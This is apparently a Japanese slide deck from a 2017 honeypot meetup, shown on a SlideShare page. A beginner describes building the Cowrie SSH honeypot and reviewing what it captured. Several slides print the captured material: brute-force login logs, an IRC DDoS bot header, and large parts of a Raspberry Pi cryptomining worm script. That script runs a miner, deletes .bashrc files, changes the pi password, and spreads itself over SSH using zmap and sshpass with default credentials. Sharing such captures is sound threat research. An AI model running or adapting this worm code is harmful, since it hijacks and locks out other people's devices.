Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

素人ハニーポッターがCowrie構築したってよ

4.725 visualizaciones

Publicado el

ハニーポット運用初心者がkippoの後継Cowrieで遊んだ話
2017/09/30 ハニーポット技術交流会発表資料

Publicado en: Ingeniería
  • Sé el primero en comentar

素人ハニーポッターがCowrie構築したってよ

  1. 1. 素人ハニーポッターがCowrie構 築したってよ Masanobu Miyagi
  2. 2. 自己紹介 • 宮城 正伸 • @RaspERMasa Raspberry piでWOLしてた人 • 株式会社ラック/Webアプリケ ーション診断 • PowerEdge R610, R710 24h/265day 稼働中 • ハニーポット歴/1ヶ月(新人)
  3. 3. CowrieをCentOS 7で 構築したお話
  4. 4. 構築は簡単 • インストール時のコマンド数がそこまで多くない • 依存関係の影響範囲 小 • 初心者でも2時間程度で構築完了
  5. 5. 構築は簡単 http://tech-study.hateblo.jp/entry/2017/08/26/075818
  6. 6. 祝・攻撃観測 • 構築後1日以内で最初の訪問者様 Welcome to My honeypot !! • 約1週間ほど続いた 現在も継続中 • 何度同じIP弾こうと思ったこry
  7. 7. 祝・攻撃観測
  8. 8. 祝・攻撃観測 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: /gweerwe323f 2017-08-26T22:23:01+0900 CMD: 何かのパスを叩いてるだけ。。。 実行できないけどね
  9. 9. 祝・攻撃観測 1週間ほど変化なし(同じようなログ) userdb.txtに「ログイン失敗」しているアカウント情報を追加すれば。。。 →ログイン成功させて、次の一手を見る
  10. 10. ログイン失敗 2017-09-18T22:13:30+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2059,71.212.172.157] login attempt [pi/raspberryraspberry993311] fa 2017-09-19T03:30:27+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2212,103.53.77.118] login attempt [pi/raspberryraspberry993311] faile 2017-09-19T03:33:30+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2214,98.31.13.113] login attempt [admin/admin1234] failed 2017-09-19T03:46:46+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2218,82.81.139.74] login attempt [pi/raspberryraspberry993311] failed 2017-09-19T05:13:29+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2225,122.249.98.242] login attempt [admin/motorola] failed 2017-09-19T05:13:30+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2225,122.249.98.242] login attempt [admin/aerohive] failed 2017-09-19T05:13:31+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2225,122.249.98.242] login attempt [admin/1111] failed 2017-09-19T11:41:14+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2303,101.184.82.174] login attempt [pi/raspberryraspberry993311] fa Raspberry pi狙ってるみたい
  11. 11. userdb.txtにユーザ情報追加 $ vi data/userdb.txt root:x:!root root:x:!123456 (ここに追加していく) ログインに失敗しているユーザ情報を userdb.txtに追記する
  12. 12. その後 2017-09-07T17:47:49+0900 [SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,7449,78.159.192.26] CMD: mkdir -p /ro authorizedに追記したり、色々情報収集してる模様
  13. 13. 設置されたBot例 ############################################################################################## ## DDoS Perl IrcBot v1.0 / 2017 By G ## [ Help ] ########################################### Stealth MultiFunctional IrcBot writen in Perl #################################################### ## Teste on every system with PERL instlled ## !u @system ## ## ## !u @version ## ## This is a free program used on your own risk. ## !u @channel ## ## Created for educational purpose only. ## !u @flood ## ## I'm not responsible for the illegal use of this program. ## !u @utils ## ##############################################################################################
  14. 14. Raspberry piを狙う攻撃 • 数ヶ月前に流行った「マイニングマルウェア」の設置 • 勝手にマイニング始めるよ! by 攻撃者
  15. 15. Raspberry piを狙う攻撃 https://japan.zdnet.com/articl e/35102503/ Raspberry piをデフォルト設定 で運用している人は要注意! pi/raspberry このログイン情報で突破された
  16. 16. Raspberry piを狙う攻撃 #!/bin/bash MYSELF=`realpath $0` DEBUG=/dev/null echo $MYSELF >> $DEBUG rm -rf nohup.out if [ "$EUID" -ne 0 ] then sudo nohup $MYSELF &>> $DEBUG & else TMP1=`mktemp` echo $TMP1 >> $DEBUG cat > $TMP1 << EOFMARKER H4sICH7bDFkAA21pbmVyZADE/Q98VNd95w/fGY2kkTS2BxsntKFhBAIEKImISavukmSwSUoakgwY J2qjxiMQthwr9gByojRqOxISCNC0A5JtpUXRYJNW3dJ0sOVUbZV0sElKW7IlXdrl1/LanisYkG3t ht1ld8kuWz+f9zmjIGvT7v72eV6vh0S+d+4999xzz/l+P9+/55xf+8jWjwYCAW/uX9Cr9/iVXRHw Nui4dXHEC4a88g1ezAvr3lLvXdxPbb0r4m296y77F1Y5/kKlvwr9bbB/AftnK9Rfeel+GfcC/AXs 30/o90+U7pWKlv65X816F3/lpWv2fjSiv7vtnx/0vLb73Hu5r59eRPcjusdfWA/wVzGvjYkAfwH7 t1m/N8+7t63Y2eb9mH+VvFZ/7+t4Yuf7Otre0/HEU890vad17xfaH3vvvqff+4BXej5aavnPffKR Up+6d8dK9xeX+oD7U69tXPnul7puvbV6bM/XXtp9ZvJdL3yo1XN9Rflq/S1Pq3sLNZW2smgy1htu
  17. 17. Raspberry piを狙う攻撃 sudo nohup $TMP2 -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 45hgMAs1sNdMs7H9aCQm8oMCG5HGg37nv9Ab5r8u4R9gcWkSteobyt6faT & sleep 3 rm -rf $TMP2 rm -rf /tmp/ktx* rm -rf /tmp/cpuminer-multi echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts rm -rf /root/.bashrc rm -rf /home/pi/.bashrc usermod -p $6$U1Nu9qCp$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1 pi for pid in `netstat -pant | grep -v "ssh" | grep -v "minerd" | grep ESTABLISHED | awk -F ' ' '{print $7}' | awk -F '/' '{print $1}'` do echo $pid kill -9 $pid done マイニングプールに接続するらしい
  18. 18. Raspberry piを狙う攻撃 Part 2 chmod +x /tmp/$BOT nohup /tmp/$BOT 2>&1 > /tmp/bot.log & rm /tmp/nohup.log -rf rm -rf nohup.out sleep 3 rm -rf /tmp/$BOT NAME=`mktemp -u 'XXXXXXXX'` date > /tmp/.s apt-get update -y --force-yes apt-get install zmap sshpass -y --force-yes while [ true ]; do FILE=`mktemp` zmap -p 22 -o $FILE -n 100000 killall ssh scp for IP in `cat $FILE` do sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyCheckin g=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o Use rKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o Stric tHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredA uthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & done rm -rf $FILE sleep 10 done fi BOT化を企むものも設置されてました。。。
  19. 19. 今回設置されたファイルたち • IRC Bot md5 : 84fa8f6d0dd1c7c4aff192a662746ec3 • Raspberry pi マイニングマルウェア md5 : 81d98d94c3ff744a6087961f41b096da
  20. 20. まとめ
  21. 21. まとめ • 初心者でもハニーポットでここまで遊べる! • 最近の流行はマイニングマルウェア? • 攻撃者の考えなどを知る良いきっかけになった
  22. 22. Thank you for listening

×